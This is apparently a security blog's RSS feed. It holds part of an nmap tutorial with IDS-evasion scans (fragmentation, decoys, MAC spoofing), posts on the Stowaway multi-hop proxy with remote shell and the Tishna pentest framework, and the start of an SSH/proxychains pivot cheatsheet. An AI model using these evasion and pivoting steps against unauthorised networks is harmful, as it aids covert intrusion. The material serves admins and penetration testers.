123/udp  open|filtered ntp
161/udp  open|filtered snmp
2049/udp open|filtered nfs
5353/udp open|filtered zeroconf
MAC Address: 00:11:32:11:15:FC (Synology Incorporated)
&nbsp;
Nmap done: 1 IP address (1 host up) scanned in 1099.55 seconds</pre>
</td>
</tr>
</tbody>
</table>
</div>
<h2>#24: Scan for IP protocol</h2>
<p>This type of scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by target machines:</p>
<pre>nmap -sO 192.168.1.1</pre>
<h2>#25: Scan a firewall for security weakness</h2>
<p>The following scan types exploit a subtle loophole in the TCP and good for testing security of common attacks:</p>
<div class="wp_syntax">
<table>
<tbody>
<tr>
<td class="code">
<pre class="bash">## TCP Null Scan to fool a firewall to generate a response ##
## Does not set any bits (TCP flag header is 0) ##
nmap -sN 192.168.1.254
&nbsp;
## TCP Fin scan to check firewall ##
## Sets just the TCP FIN bit ##
nmap -sF 192.168.1.254
&nbsp;
## TCP Xmas scan to check firewall ##
## Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree ##
nmap -sX 192.168.1.254</pre>
</td>
</tr>
</tbody>
</table>
</div>
<p>&nbsp;</p>
<p>See&nbsp;how to block Xmas packkets, syn-floods and other conman attacks&nbsp;with iptables.</p>
<h2>#26: Scan a firewall for packets fragments</h2>
<p>The -f option causes the requested scan (including ping scans) to use tiny fragmented IP packets. The idea is to split up the TCP header over<br />several packets to make it harder for packet filters, intrusion detection systems, and other annoyances to detect what you are doing.</p>
<p>&lt;pre &#8220;=&#8221;&#8221; lang=&#8221;bash&#8221;&gt;nmap -f 192.168.1.1 nmap -f fw2.nixcraft.net.in nmap -f 15 fw2.nixcraft.net.in ## Set your own offset size with the &#8211;mtu option ## nmap &#8211;mtu 32 192.168.1.1</p>
<h2>#27: Cloak a scan with decoys</h2>
<p>The&nbsp;<kbd>-D</kbd>&nbsp;option it appear to the remote host that the host(s) you specify as&nbsp;decoys are scanning the target network too. Thus their IDS might report 5-10 port scans from unique IP addresses, but they won’t know which IP was scanning them and which were innocent decoys:</p>
<pre>nmap -n -Ddecoy-ip1,decoy-ip2,your-own-ip,decoy-ip3,decoy-ip4 remote-host-ip
nmap -n -D192.168.1.5,10.5.1.2,172.1.2.4,3.4.2.1 192.168.1.5</pre>
<h2>#28: Scan a firewall for MAC address spoofing</h2>
<div class="wp_syntax">
<table>
<tbody>
<tr>
<td class="code">
<pre class="bash">### Spoof your MAC address ##
nmap --spoof-mac MAC-ADDRESS-HERE 192.168.1.1
&nbsp;
### Add other options ###
nmap -v -sT -PN --spoof-mac MAC-ADDRESS-HERE 192.168.1.1
&nbsp;
&nbsp;
### Use a random MAC address ###
### The number 0, means nmap chooses a completely random MAC address ###
nmap -v -sT -PN --spoof-mac 0 192.168.1.1</pre>
</td>
</tr>
</tbody>
</table>
</div>
<h2>#29: How do I save output to a text file?</h2>
<p>The syntax is:</p>
<pre>nmap 192.168.1.1 &gt; output.txt
nmap -oN /path/to/filename 192.168.1.1
nmap -oN output.txt 192.168.1.1
</pre>
<h2>#30 Scans for web servers and pipes into Nikto for scanning</h2>
<p><code>nmap -p80 192.168.1.2/24 -oG - | /path/to/nikto.pl -h -<br />nmap -p80,443 192.168.1.2/24 -oG - | /path/to/nikto.pl -h -</code></p>
<h2>#31 Speed up nmap</h2>
<p>Pass the -T option:<br /><code>nmap -v -sS -A -T4 192.168.2.5</code></p>
<p><em>Sample outputs:</em></p>
<pre>Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-15 01:52 IST
NSE: Loaded 143 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 01:52
Completed NSE at 01:52, 0.00s elapsed
Initiating NSE at 01:52
Completed NSE at 01:52, 0.00s elapsed
Initiating ARP Ping Scan at 01:52
Scanning 192.168.2.15 [1 port]
Completed ARP Ping Scan at 01:52, 0.01s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 01:52
Scanning dellm6700 (192.168.2.15) [1000 ports]
Discovered open port 5900/tcp on 192.168.2.15
Discovered open port 80/tcp on 192.168.2.15
Discovered open port 22/tcp on 192.168.2.15
Completed SYN Stealth Scan at 01:53, 4.62s elapsed (1000 total ports)
Initiating Service scan at 01:53
Scanning 3 services on dellm6700 (192.168.2.15)
Completed Service scan at 01:53, 6.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against dellm6700 (192.168.2.15)
Retrying OS detection (try #2) against dellm6700 (192.168.2.15)
NSE: Script scanning 192.168.2.15.
Initiating NSE at 01:53
Completed NSE at 01:53, 30.02s elapsed
Initiating NSE at 01:53
Completed NSE at 01:53, 0.00s elapsed
Nmap scan report for dellm6700 (192.168.2.15)
Host is up (0.00044s latency).
Not shown: 996 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   open   ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-OpenSSH_7.4p1 Ubuntu-10
| ssh-hostkey: 
|   2048 1d:14:84:f0:c7:21:10:0e:30:d9:f9:59:6b:c3:95:97 (RSA)
|_  256 dc:59:c6:6e:33:33:f2:d2:5d:9b:fd:b4:9c:52:c1:0a (ECDSA)
80/tcp   open   http    nginx 1.10.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp  closed https
5900/tcp open   vnc     VNC (protocol 3.7)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.40%I=7%D=5/15%Time=5918BCAA%P=x86_64-apple-darwin16.3.0%
SF:r(NULL,20,"SSH-2\.0-OpenSSH_7\.4p1\x20Ubuntu-10\n");
MAC Address: F0:1F:AF:1F:2C:60 (Dell)
Device type: general purpose
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (95%), OpenBSD 4.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:openbsd:openbsd:4.0
Aggressive OS guesses: Linux 3.11 - 4.1 (95%), Linux 4.4 (95%), Linux 3.13 (92%), Linux 4.0 (90%), Linux 2.6.32 (89%), Linux 2.6.32 or 3.10 (89%), Linux 3.2 - 3.8 (89%), Linux 3.10 - 3.12 (88%), Linux 2.6.32 - 2.6.33 (87%), Linux 2.6.32 - 2.6.35 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.000 days (since Mon May 15 01:53:08 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms dellm6700 (192.168.2.15)

NSE: Script Post-scanning.
Initiating NSE at 01:53
Completed NSE at 01:53, 0.00s elapsed
Initiating NSE at 01:53
Completed NSE at 01:53, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.02 seconds
           Raw packets sent: 2075 (95.016KB) | Rcvd: 50 (3.084KB)
</pre>
<h2>#32: Not a fan of command line tools?</h2>
<p>Try&nbsp;<a href="https://nmap.org/zenmap/" target="_blank" rel="noopener noreferrer">zenmap the official network mapper</a>&nbsp;front end:</p>
<blockquote>
<p>Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.</p>
</blockquote>
<p>You can install zenmap using the following&nbsp;<a href="https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html">apt-get command</a>:<br /><code>$ sudo apt-get install zenmap</code></p>
<p><em>Sample outputs:</em></p>
<pre>[sudo] password for vivek: 
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  zenmap
0 upgraded, 1 newly installed, 0 to remove and 11 not upgraded.
Need to get 616 kB of archives.
After this operation, 1,827 kB of additional disk space will be used.
Get:1 http://debian.osuosl.org/debian/ squeeze/main zenmap amd64 5.00-3 [616 kB]
Fetched 616 kB in 3s (199 kB/s)                       
Selecting previously deselected package zenmap.
(Reading database ... 281105 files and directories currently installed.)
Unpacking zenmap (from .../zenmap_5.00-3_amd64.deb) ...
Processing triggers for desktop-file-utils ...
Processing triggers for gnome-menus ...
Processing triggers for man-db ...
Setting up zenmap (5.00-3) ...
Processing triggers for python-central ...</pre>
<p>Type the following command to start zenmap:<br /><code>$ sudo zenmap</code></p>
<p><em>Sample outputs</em></p>
<figure id="attachment_275" class="wp-caption aligncenter" aria-describedby="caption-attachment-275"><a href="https://www.cyberciti.biz/networking/nmap-command-examples-tutorials/attachment/nmap-usage-examples-output/" rel="attachment wp-att-275"><img loading="lazy" decoding="async" class="size-full wp-image-275" title="Nmap Command GUI Usage Examples Output From zenmap" src="https://www.cyberciti.biz/media/new/cms/2012/11/nmap-usage-examples-output.png" sizes="auto, (max-width: 592px) 85vw, 592px" srcset="https://www.cyberciti.biz/media/new/cms/2012/11/nmap-usage-examples-output.png 592w, https://www.cyberciti.biz/media/new/cms/2012/11/nmap-usage-examples-output-278x300.png 278w" alt="Fig.02: zenmap in action" width="592" height="640"></a><figcaption id="caption-attachment-275" class="wp-caption-text"><em>Fig.02: zenmap in action</em></figcaption></figure>
<h5>References:</h5>
<ul>
<li><a href="https://nmap.org/book/toc.html" target="_blank" rel="noopener noreferrer">The official Nmap project guide to network discovery and security Scanning</a>.</li>
<li><a href="https://nmap.org/" target="_blank" rel="noopener noreferrer">The official Nmap project</a>&nbsp;home page.</li>
</ul>
<p><em>The nmap command has many more options, please go through man page or the documentation for more information.&nbsp;</em></p>
<p>The post <a href="http://kostacipo.stream/top-32-nmap-commands-for-linux-sys-network-admins/">Top 32 Nmap Commands For Linux Sys/Network Admins</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/top-32-nmap-commands-for-linux-sys-network-admins/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Stowaway &#8211; Multi-hop Proxy Tool For Pentesters</title>
		<link>http://kostacipo.stream/stowaway-multi-hop-proxy-tool-for-pentesters/</link>
					<comments>http://kostacipo.stream/stowaway-multi-hop-proxy-tool-for-pentesters/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Wed, 15 Jan 2020 10:18:14 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[proxy]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1656</guid>

					<description><![CDATA[<p>&#160; Stowaway is Multi-hop proxy tool for security researchers and pentesters. Users can easily proxy their network traffic to intranet nodes (multi-layer) PS: The files under demo folder are Stowaway&#8217;s beta version,it&#8217;s still functional, you can check the detail by README.md file under the demo folder This tool is limited to security research and teaching, [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/stowaway-multi-hop-proxy-tool-for-pentesters/">Stowaway &#8211; Multi-hop Proxy Tool For Pentesters</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<p>Stowaway is Multi-hop proxy tool for security researchers and pentesters. Users can easily proxy their network traffic to intranet nodes (multi-layer)</p>
<p>PS: The files under demo folder are Stowaway&#8217;s beta version,it&#8217;s still functional, you can check the detail by README.md file under the demo folder</p>
<blockquote><p>This tool is limited to security research and teaching, and the user bears all legal and related responsibilities caused by the use of this tool! The author and publisher does not assume any legal and related responsibilities!</p></blockquote>
<p><a name="more"></a><br /><b>Features</b></p>
<ul>
<li>Obvious node topology</li>
<li>Multi-hop socks5 traffic proxy</li>
<li>Multi-hop ssh traffic proxy</li>
<li>Remote interactive shell</li>
<li>Network traffic encryption with AES-256(CBC mode)</li>
<li>Support macos and linux</li>
</ul>
<p><b>Usage</b></p>
<p>Stowaway can be excuted as two kinds of mode: <strong>admin &amp;&amp; agent</strong><br />If you don&#8217;t want to compile the project by yourself, you can check the release folder to get ONE!</p>
<p>Simple example：</p>
<pre><code>  Admin mode：./stowaway admin -l 9999 -s 123
  
  Meaning：
  
  admin  It means Stowaway is started as admin mode
  
  -l     It means Stowaway is listening on port 9999 and waiting for incoming connection

  -s     It means Stowaway has used 123 as the encrypt key during the communication
  
  Be aware! -s option's value must be as same as the agents' 

  For now, there are only three options above are supported!
 
</code></pre>
<pre><code>  agent mode： ./stowaway agent -m 127.0.0.1:9999 -l 10000 --startnode -s 123 -r
  
  Meaning：
  
  agent It means Stowaway is started as agent mode 
  
  -m    It means Stowaway's monitor node's address (In this case,it's the node we started above)
  
  -l    It means Stowaway is listening on port 10000 and waiting for incoming connection 

  -s    It means Stowaway has used 123 as the encrypt key during the communication 

  --startnode  It means Stowaway is started as FIRST agent node(if the node is the first one , you MUST add this option!!! And there are two submode of agent mode,if you want to start the second, third one....., just remove this option)

  -r It means you want to start the node in reverse mode(For instance: you can add node 2 into the net via node 1 actively connect to node 2, instead of node 1 just waiting for the connection from node 2 )

  Be aware! -s option's value must be as same as the agents' 

 For now, there are only five options above are supported!
</code></pre>
<p><b>Example</b></p>
<p>For instance(one admin;one startnode;two simple nodes)<br /><b><br />Admin</b></p>
<div class="separator"><a href="https://1.bp.blogspot.com/-cFHr95CVCQA/XhUyqB0-VnI/AAAAAAAARXc/_j5bQznQ3bc7XD3_Uyaksi9izU-VWYEkQCNcBGAsYHQ/s1600/Stowaway_1_admin.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-cFHr95CVCQA/XhUyqB0-VnI/AAAAAAAARXc/_j5bQznQ3bc7XD3_Uyaksi9izU-VWYEkQCNcBGAsYHQ/s640/Stowaway_1_admin.png" data-original-height="474" data-original-width="1152" width="640" height="262" border="0"></a></div>
<p><b>Startnode</b></p>
<div class="separator"><a href="https://1.bp.blogspot.com/-zyNQQ4_ba8s/XhUzXWYMZXI/AAAAAAAARXk/WmINcZfiwBYZnpDt7KkuBcaeEexjTbEmACNcBGAsYHQ/s1600/Stowaway_2_startnode.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-zyNQQ4_ba8s/XhUzXWYMZXI/AAAAAAAARXk/WmINcZfiwBYZnpDt7KkuBcaeEexjTbEmACNcBGAsYHQ/s640/Stowaway_2_startnode.png" data-original-height="120" data-original-width="1094" width="640" height="70" border="0"></a></div>
<p><b>First simple Node&nbsp;</b>(setting as reverse mode)</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-D6zPKOVJZ5s/XhUzc5FXpgI/AAAAAAAARXo/j79xB7KetnQ_-tS8w00JYIcIerpjN-qNgCNcBGAsYHQ/s1600/Stowaway_3_node1.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-D6zPKOVJZ5s/XhUzc5FXpgI/AAAAAAAARXo/j79xB7KetnQ_-tS8w00JYIcIerpjN-qNgCNcBGAsYHQ/s640/Stowaway_3_node1.png" data-original-height="106" data-original-width="1132" width="640" height="58" border="0"></a></div>
<p>Now, use admin and type in &#8220;use 1&#8221; -&gt; &#8220;connect 127.0.0.1:10001&#8221; ,then you can add node 1 into the net<br /><b>Second simple Node</b></p>
<div class="separator"><a href="https://1.bp.blogspot.com/-V--IIXC8wA8/XhUzjuT-oII/AAAAAAAARXs/rZLTF60CAcwBkyeFV4aQcgopOiLXKetPwCNcBGAsYHQ/s1600/Stowaway_4_node2.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-V--IIXC8wA8/XhUzjuT-oII/AAAAAAAARXs/rZLTF60CAcwBkyeFV4aQcgopOiLXKetPwCNcBGAsYHQ/s640/Stowaway_4_node2.png" data-original-height="120" data-original-width="1060" width="640" height="72" border="0"></a></div>
<p>When all agent nodes connected，check the topology in admin</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-R3ljbVcc3kU/XhUzpdQ-6YI/AAAAAAAARX0/jOx1r-1Dad00HYmJShkDFGRWgTf7nnXYQCNcBGAsYHQ/s1600/Stowaway_5_chain.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-R3ljbVcc3kU/XhUzpdQ-6YI/AAAAAAAARX0/jOx1r-1Dad00HYmJShkDFGRWgTf7nnXYQCNcBGAsYHQ/s640/Stowaway_5_chain.png" data-original-height="764" data-original-width="1182" width="640" height="412" border="0"></a></div>
<p>Now we manipulate the second simple node through admin</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-7ev1jC-jxQo/XhUzxtYEDCI/AAAAAAAARX4/EX9-tT410aMRDclJk33I1v84OR8bBZf9wCNcBGAsYHQ/s1600/Stowaway_6_manipulate.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-7ev1jC-jxQo/XhUzxtYEDCI/AAAAAAAARX4/EX9-tT410aMRDclJk33I1v84OR8bBZf9wCNcBGAsYHQ/s640/Stowaway_6_manipulate.png" data-original-height="760" data-original-width="1158" width="640" height="420" border="0"></a></div>
<p>Open the remote interactive shell</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-gczXTj7Gn7g/XhUz58wvFeI/AAAAAAAARYE/EGdNFtGL-qQjIf6BcafBR2aYyy2MtKhJACNcBGAsYHQ/s1600/Stowaway_7_shell.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-gczXTj7Gn7g/XhUz58wvFeI/AAAAAAAARYE/EGdNFtGL-qQjIf6BcafBR2aYyy2MtKhJACNcBGAsYHQ/s640/Stowaway_7_shell.png" data-original-height="822" data-original-width="1198" width="640" height="438" border="0"></a></div>
<p>Now you can use interactive shell (the second simple node&#8217;s) through admin<br /><b>Start socks5 proxy service</b></p>
<div class="separator"><a href="https://1.bp.blogspot.com/-oG0paSJJjE8/XhU0Ap089XI/AAAAAAAARYI/55EJ-KM_wSIa2aBCXgVTgkCEanUuqSjZgCNcBGAsYHQ/s1600/Stowaway_8_socks5.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-oG0paSJJjE8/XhU0Ap089XI/AAAAAAAARYI/55EJ-KM_wSIa2aBCXgVTgkCEanUuqSjZgCNcBGAsYHQ/s640/Stowaway_8_socks5.png" data-original-height="660" data-original-width="1070" width="640" height="394" border="0"></a></div>
<p>Now you can use the admin&#8217;s port 7777 as the socks5 proxy service. And it can proxy your traffic to the second simple node and the second simple node will do its work as socks server（ When you want to shut down this socks5 service, just type in &#8220;stopsocks&#8221; under this mode to turn off it)<br /><b><br />Open ssh</b></p>
<div class="separator"><a href="https://1.bp.blogspot.com/-7NAT8aWSPSI/XhU0Fv_tO_I/AAAAAAAARYQ/lFyTYtzLUXkcjAKKb-zOJD_P3r4kVzRFgCNcBGAsYHQ/s1600/Stowaway_9_ssh.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-7NAT8aWSPSI/XhU0Fv_tO_I/AAAAAAAARYQ/lFyTYtzLUXkcjAKKb-zOJD_P3r4kVzRFgCNcBGAsYHQ/s640/Stowaway_9_ssh.png" data-original-height="672" data-original-width="1092" width="640" height="392" border="0"></a></div>
<p>And it can proxy your ssh traffic to the second simple node and the second simple node will do its work as ssh cilent<br />PS: In this function,you can type in <code>pwd</code> to check where you currently are</p>
<pre><code>For more detail, just type help to get further informations
</code></pre>
<p><b>Attention</b></p>
<ul>
<li>This porject is coding just for fun , the logic structure and code structure are not strict enough, please don&#8217;t be so serious about it</li>
<li>When the admin offline, all agent nodes will offline too(maybe it will be changed in future)</li>
<li>When one of the agents offline, the agent nodes after it will offline</li>
<li>Once the admin started, you need to connect at least one agent node to it before you do any operations</li>
<li>If you want to compile this project for supporting more platform, you can use <code>go build -ldflags="-w -s"</code> to do that</li>
<li>Temporarily does not support Windows</li>
</ul>
<div><b><a class="kiploit-download" title="Download Stowaway" href="https://github.com/ph4ntonn/Stowaway" target="_blank" rel="nofollow noopener noreferrer">Download Stowaway</a></b></div>
<p>The post <a href="http://kostacipo.stream/stowaway-multi-hop-proxy-tool-for-pentesters/">Stowaway &#8211; Multi-hop Proxy Tool For Pentesters</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/stowaway-multi-hop-proxy-tool-for-pentesters/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Tishna &#8211; Complete Automated Pentest Framework For Servers, Application Layer To Web Security</title>
		<link>http://kostacipo.stream/tishna-complete-automated-pentest-framework-for-servers-application-layer-to-web-security/</link>
					<comments>http://kostacipo.stream/tishna-complete-automated-pentest-framework-for-servers-application-layer-to-web-security/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Wed, 15 Jan 2020 10:14:40 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[pentest]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1653</guid>

					<description><![CDATA[<p>&#160; A complete Automated pentest framework for Servers, Application Layer to Web Security Interface The software has 62 Options with full automation and can be use aas a web security swiss knife &#160; Tishna Tishna is a Web Server Security Penetration Software for Ultimate Security Analaysis Kali, Parrot OS, Black Arch, Termux, Android Led TV [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/tishna-complete-automated-pentest-framework-for-servers-application-layer-to-web-security/">Tishna &#8211; Complete Automated Pentest Framework For Servers, Application Layer To Web Security</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<p>A complete Automated pentest framework for Servers, Application Layer to Web Security</p>
<p><b>Interface</b></p>
<ul>
<li>The software has 62 Options with full automation and can be use aas a web security swiss knife</li>
</ul>
<div>
<div class="separator"><a href="https://1.bp.blogspot.com/-Tj1Ai0nUCnQ/XgqoGanvgbI/AAAAAAAARVM/IMIFT-j2E-4Cyx4fKie3LzqmtU6nBCStACNcBGAsYHQ/s1600/Tishna-Automated-Web-Application-Hacker_3.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-Tj1Ai0nUCnQ/XgqoGanvgbI/AAAAAAAARVM/IMIFT-j2E-4Cyx4fKie3LzqmtU6nBCStACNcBGAsYHQ/s640/Tishna-Automated-Web-Application-Hacker_3.png" data-original-height="670" data-original-width="659" width="628" height="640" border="0"></a></div>
<p><a name="more"></a></p>
<div class="separator"><a href="https://1.bp.blogspot.com/-CbCUPOjbHSA/XgqoGQBCYXI/AAAAAAAARVE/xmV08dxl1mMLwgjr9dOjCGHK0SxMlJWFACNcBGAsYHQ/s1600/Tishna-Automated-Web-Application-Hacker_1.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-CbCUPOjbHSA/XgqoGQBCYXI/AAAAAAAARVE/xmV08dxl1mMLwgjr9dOjCGHK0SxMlJWFACNcBGAsYHQ/s640/Tishna-Automated-Web-Application-Hacker_1.png" data-original-height="673" data-original-width="594" width="564" height="640" border="0"></a></div>
<p></p>
<div class="separator"><a href="https://1.bp.blogspot.com/-L4oNnBamOvo/XgqoGVCqJnI/AAAAAAAARVI/wIcQAPOgAe8RBAnpC_HT-CltUdRBKWEHgCNcBGAsYHQ/s1600/Tishna-Automated-Web-Application-Hacker_2.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-L4oNnBamOvo/XgqoGVCqJnI/AAAAAAAARVI/wIcQAPOgAe8RBAnpC_HT-CltUdRBKWEHgCNcBGAsYHQ/s640/Tishna-Automated-Web-Application-Hacker_2.png" data-original-height="170" data-original-width="581" width="640" height="186" border="0"></a></div>
</div>
<div>&nbsp;</div>
<p><b>Tishna</b></p>
<ul>
<li>Tishna is a Web Server Security Penetration Software for Ultimate Security Analaysis</li>
<li>Kali, Parrot OS, Black Arch, Termux, Android Led TV</li>
</ul>
<p><b>Appeared</b></p>
<ul>
<li>Cyber Space (Computer Security)</li>
<li>Terror Security (Computer Security)</li>
<li>National Cyber Security Services</li>
</ul>
<p><b>Brief Introduction</b></p>
<ul>
<li>Tishna is useful in Banks, Private Organisations and Ethical hacker personnel for legal auditing.</li>
<li>It serves as a defense method to find as much as information possible for gaining unauthorised access and intrusion.</li>
<li>With the emergence of more advanced technology, cybercriminals have also found more ways to get into the system of many organizations.</li>
<li>Tishna software can audit, servers and web behaviour.</li>
<li>Tishna can perform Scanning &amp; Enumeration as much as possible of target.</li>
<li>It’s first step to stop cyber criminals by securing your Servers and Web Application Security.</li>
<li>Tishna is false positive free, when there is something it will show no matter what, if it is not, it will give blank results rather error.</li>
</ul>
<p><b>Kali Installation</b></p>
<ul>
<li>git clone <a title="https://github.com/haroonawanofficial/Tishna.git" href="https://github.com/haroonawanofficial/Tishna.git" target="_blank" rel="nofollow noopener noreferrer">https://github.com/haroonawanofficial/Tishna.git</a></li>
<li>cd Tishna</li>
<li>sudo chmod u+x *.sh</li>
<li>./Kali_Installer.sh</li>
<li>Tishna will integrate as system software</li>
<li>Dependencies will be handled automatically</li>
<li>Third party software(s)/dependencies/modules will be handled automatically</li>
</ul>
<div><b><a class="kiploit-download" title="Download Tishna-Automated-Web-Application-Hacker" href="https://github.com/haroonawanofficial/Tishna-Automated-Web-Application-Hacker" target="_blank" rel="nofollow noopener noreferrer">Download Tishna-Automated-Web-Application-Hacker</a></b></div>
<p>The post <a href="http://kostacipo.stream/tishna-complete-automated-pentest-framework-for-servers-application-layer-to-web-security/">Tishna &#8211; Complete Automated Pentest Framework For Servers, Application Layer To Web Security</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/tishna-complete-automated-pentest-framework-for-servers-application-layer-to-web-security/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>A Pivot Cheatsheet for Pentesters</title>
		<link>http://kostacipo.stream/a-pivot-cheatsheet-for-pentesters/</link>
					<comments>http://kostacipo.stream/a-pivot-cheatsheet-for-pentesters/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Wed, 08 Jan 2020 10:26:59 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[pivot]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1632</guid>

					<description><![CDATA[<p>&#160; I don&#8217;t often come get a chance to use pivot techniques, so I sometimes find myself searching for reminders about various methods and their trade offs. I put together this list of common pivot techniques I have used, along with a quick to setup docker-compose environment to get you playing with each method quickly. [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/a-pivot-cheatsheet-for-pentesters/">A Pivot Cheatsheet for Pentesters</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<p>I don&#8217;t often come get a chance to use pivot techniques, so I sometimes find myself searching for reminders about various methods and their trade offs.</p>
<p>I put together this list of common pivot techniques I have used, along with a quick to setup docker-compose environment to get you playing with each method quickly.</p>
<p>At the end of the article is a quick look cheatsheet with all the key setup commands for each pivot type.</p>
<h2 id="a-fast-pivot-environment">A Fast Pivot Environment</h2>
<p>If you want to play around with the pivots I discuss below, I put together a <a href="https://github.com/Charlie-belmer/pentest-pivot-example">simple docker environment</a> to play with. It has three machines and two networks. The machines:</p>
<ul>
<li>A gateway running SSH with access to public and private networks (like a jump host).</li>
<li>A host running WebGoat vulnerable webapp on the private network only.</li>
<li>A Metasploit image on the public network only.</li>
</ul>
<p>The SSH machine is accessible from localhost on port 20022 instead of 22, but you can also use the metasploit container for all testing.</p>
<p>You can get this environment running with docker and docker compose by checking out the repository, then running <code>docker-compose build</code> and <code>docker-compose up</code>.</p>
<h2 id="method-1-pivot-with-ssh-proxychains">Method 1: Pivot with SSH &amp; ProxyChains</h2>
<p>This method leverages SSH with dynamic port forwarding to create a socks proxy, with proxychains to help with tools that can&#8217;t use socks proxies. You can leverage this tunnel two ways:</p>
<ul>
<li>In a tool, configure a SOCKS proxy and point it to the SSH tunnel. This works great in tools that support it like Burp.</li>
<li>Run a command with proxychains, which tunnels data over the SSH proxy.</li>
</ul>
<p>This method allows mostly complete access to the target network, with few limitations, and is generally my preferred way to access gated networks. It requires the following pre-conditions to leverage:</p>
<ul>
<li>Access on target machine</li>
<li>SSH service running on target machine and reachable from the attacker machine.</li>
<li>A password compromise or writing of a public key for entry, to a user that allows remote SSH login.</li>
</ul>
<p>Non-root accounts may limit some tools from working fully (such as nmap), when creating certain types of packets are root only activities.</p>
<h3 id="setting-up-the-tunnel">Setting up the tunnel</h3>
<p>First login with SSH using dynamic port forwarding. Assuming you are using the sample environment:</p>
<pre class=" language-bash"><code class=" language-bash"><span class="token function">ssh</span> -D localhost:9000 -f -N pentester@localhost -p 20022
</code></pre>
<p>This sets up &nbsp;an SSH tunnel in the background on local port 9000.</p>
<h3 id="setup-proxychains">Setup ProxyChains</h3>
<p>In /etc/proxychains4.conf (or similar depending on version), add the following to the end of the file:</p>
<pre class=" language-conf"><code class=" language-conf">socks5 127.0.0.1 9000
</code></pre>
